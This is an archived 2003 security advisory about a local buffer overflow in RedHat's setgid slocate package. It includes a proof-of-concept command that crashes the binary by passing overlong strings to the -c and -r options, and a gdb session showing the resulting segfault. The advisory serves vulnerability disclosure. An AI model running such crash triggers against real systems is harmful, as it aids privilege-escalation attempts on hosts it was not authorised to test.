Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx5952.htm

slocate buffer overflow



25th Jan 2003 [SBWID-5952]
COMMAND

	slocate buffer overflow

SYSTEMS AFFECTED

	?

PROBLEM

	inkubus [inkubus@hushmail.com], with credits to  Knight420,  Team  TESO,
	Michal Zalewski, Aleph1, dvdman, says in a USG Security Advisory :
	
	 http://www.usg.org.uk/advisories/2003.001.txt
	
	Accordingly to research done by  USG  team  members  and  Knight420  who
	informed us about this vulnerability a week earlier, there  is  a  local
	buffer overflow in the slocate  package  shipped  with  the  most  newer
	RedHat distributions, we have tested the vulnerability  only  in  RedHat
	Linux 7.2 and 7.3 but  we  think  that  other  Linux/*nix  systems  that
	provide slocate package may be  vulnerable  too.  The  overflow  appears
	when the slocate is runned with two parameters:  -c  and  -r,  using  as
	arguments a 1024 (or 10240, as Knight420 has informed us earlier)  bytes
	string.
	
	[inkubus@USG audit]$ rpm -qf /usr/bin/slocate && ls -al /usr/bin/slocate
	slocate-2.6-1
	- -rwxr-sr-x    1 root     slocate     25020 Jun 25  2001 /usr/bin/slocate
	[inkubus@USG audit]$ /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	Segmentation fault
	[inkubus@USG audit]$ gdb /usr/bin/slocate
	GNU gdb Red Hat Linux (5.1.90CVS-5)
	Copyright 2002 Free Software Foundation, Inc.
	GDB is free software, covered by the GNU General Public License, and you are
	welcome to change it and/or distribute copies of it under certain conditions.
	Type "show copying" to see the conditions.
	There is absolutely no warranty for GDB.  Type "show warranty" for details.
	This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
	(gdb) r -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	Starting program: /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	warning: slocate: could not open database: /var/lib/slocate/slocate.db: Permission denied
	warning: You need to run the 'updatedb' command (as root) to create the database.
	warning: slocate: decode_db(): BBBBBBBBBBBB: No such file or directory
	warning: You need to run the 'updatedb' command (as root) to create the database.
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x42080b1b in strlen () from /lib/i686/libc.so.6
	(gdb)
	

SOLUTION

	New release available


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH